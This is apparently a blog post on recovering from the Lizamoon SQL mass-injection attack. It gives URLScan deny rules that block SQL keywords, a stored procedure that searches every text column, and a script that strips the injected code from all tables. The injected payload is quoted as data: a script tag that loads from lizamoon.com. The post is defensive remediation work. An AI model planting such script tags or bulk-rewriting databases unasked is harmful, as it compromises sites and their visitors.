Edit3: Currently testing the following urlscan sql inject blocking rules;

I don’t have time to fix the wordpress syntax issues, so I’m posting the code on Pastebin also;

CODE ALSO HERE http://pastebin.com/y40r6X6J

<span style="font-family: Consolas, Monaco, 'Courier New', Courier, monospace; font-size: 12px; line-height: 18px; white-space: pre;">RuleList=SQL Injection</span>
<pre> 
[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=SQL Injection Headers

[SQL Injection Strings]
--
%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
kill
open
select
sys ; also catches sysobjects and syscolumns
table

[SQL Injection Headers]

AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=0
ScanHeaders=Cookie:

[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
cast
convert
declare
delete
drop
exec ; also catches execute
fetch
insert
kill
select</pre>

Edit2: I am now seeing injections using hxxp://t6ryt56.info/ur.php as the URL instead of lizamoon.

Edit: I’m still working out the WordPress code issues. A lot has been appended that should not be in the below code, <span> etc, will fix soon.

Great information located here, Websense appears to be keeping pretty up to date on it;

http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx

#

I have a feeling that this Lizamoon.com inject will be getting around quite a bit.

Here are the steps I took to resolve post-injection, – tested on SQL2k5 – CODE ALSO HERE http://pastebin.com/M3BmePWC

1. I wanted an easy way to track down every instance of a keyword in EVERY column and table. I used this stored procedure;



CREATE PROC FindAll

(

    @SearchStr nvarchar(100)

)

AS

BEGIN

</span></span></pre>

<pre><span style="font-family: Verdana; font-size: x-small;"><span style="color: blue; font-family: verdana; font-size: xx-small;"> CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))



    SET NOCOUNT ON



    DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)

    SET  @TableName = ''

    SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')



    WHILE @TableName IS NOT NULL

    BEGIN

        SET @ColumnName = ''

        SET @TableName =

        (

            SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))

            FROM    INFORMATION_SCHEMA.TABLES

            WHERE       TABLE_TYPE = 'BASE TABLE'

                AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName

                AND OBJECTPROPERTY(

                        OBJECT_ID(

                            QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)

                             ), 'IsMSShipped'

                               ) = 0

        )



        WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)

        BEGIN

            SET @ColumnName =

            (

                SELECT MIN(QUOTENAME(COLUMN_NAME))

                FROM    INFORMATION_SCHEMA.COLUMNS

                WHERE       TABLE_SCHEMA    = PARSENAME(@TableName, 2)

                    AND TABLE_NAME  = PARSENAME(@TableName, 1)

                    AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')

                    AND QUOTENAME(COLUMN_NAME) > @ColumnName

            )



            IF @ColumnName IS NOT NULL

            BEGIN

                INSERT INTO #Results

                EXEC

                (

                    'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)

                    FROM ' + @TableName + ' (NOLOCK) ' +

                    ' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2

                )

            END

        END

    END



    SELECT ColumnName, ColumnValue FROM #Results

END</span></span></pre>

<pre><span style="font-family: Verdana; font-size: x-small;"><span style="color: blue; font-family: verdana; font-size: xx-small;">

This will be executed via the following query;

EXEC FindAll 'lizamoon'

Now that we know what we’re working against, you’ll want to find and replace with blank space (this will not affect anything outside of the string). CODE ALSO HERE – http://pastebin.com/cJ1SWaKh

SET NOCOUNT ON
 
DECLARE @stringToFind VARCHAR(100)
DECLARE @stringToReplace VARCHAR(100)
DECLARE @schema sysname
DECLARE @table
sysname
DECLARE @count INT
DECLARE @sqlCommand VARCHAR(8000)
DECLARE @where VARCHAR(8000)
DECLARE @columnName
sysname
DECLARE @object_id INT
SET @stringToFind = '&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;'
SET @stringToReplace = ''
DECLARE TAB_CURSOR CURSOR  FOR
SELECT   B.NAME      AS SCHEMANAME,
A.NAME      AS TABLENAME,
A.OBJECT_ID
FROM     sys.objects A
INNER JOIN sys.schemas B
ON A.SCHEMA_ID = B.SCHEMA_ID
WHERE    TYPE = 'U'
ORDER BY 1
OPEN TAB_CURSOR
FETCH NEXT FROM TAB_CURSOR
INTO @schema,
@table,
@object_id
WHILE @@FETCH_STATUS = 0
BEGIN
DECLARE COL_CURSOR CURSOR FOR
SELECT A.NAME
FROM   sys.columns A
INNER JOIN sys.types B
ON A.SYSTEM_TYPE_ID = B.SYSTEM_TYPE_ID
WHERE  OBJECT_ID = @object_id
AND IS_COMPUTED = 0
AND B.NAME IN ('char','nchar','nvarchar','varchar','text','ntext')
OPEN COL_CURSOR
 
FETCH NEXT FROM COL_CURSOR
INTO @columnName
WHILE @@FETCH_STATUS = 0
BEGIN
SET @sqlCommand = 'UPDATE ' + @schema + '.' + @table + ' SET [' + @columnName + '] = REPLACE(convert(nvarchar(max),[' + @columnName + ']),''' + @stringToFind + ''',''' + @stringToReplace + ''')'
SET @where = ' WHERE [' + @columnName + '] LIKE ''%' + @stringToFind + '%'''
EXEC( @sqlCommand + @where)
SET @count = @@ROWCOUNT
IF @count &gt; 0
BEGIN
PRINT @sqlCommand + @where
PRINT 'Updated: ' + CONVERT(VARCHAR(10),@count)
PRINT '----------------------------------------------------'
END
FETCH NEXT FROM COL_CURSOR
INTO @columnName
END
CLOSE COL_CURSOR
DEALLOCATE COL_CURSOR
FETCH NEXT FROM TAB_CURSOR
INTO @schema,
@table,
@object_id
END
 

 

 

 

 

 

 

CLOSE TAB_CURSOR
DEALLOCATE TAB_CURSOR

 

Share

Tags: , , , , ,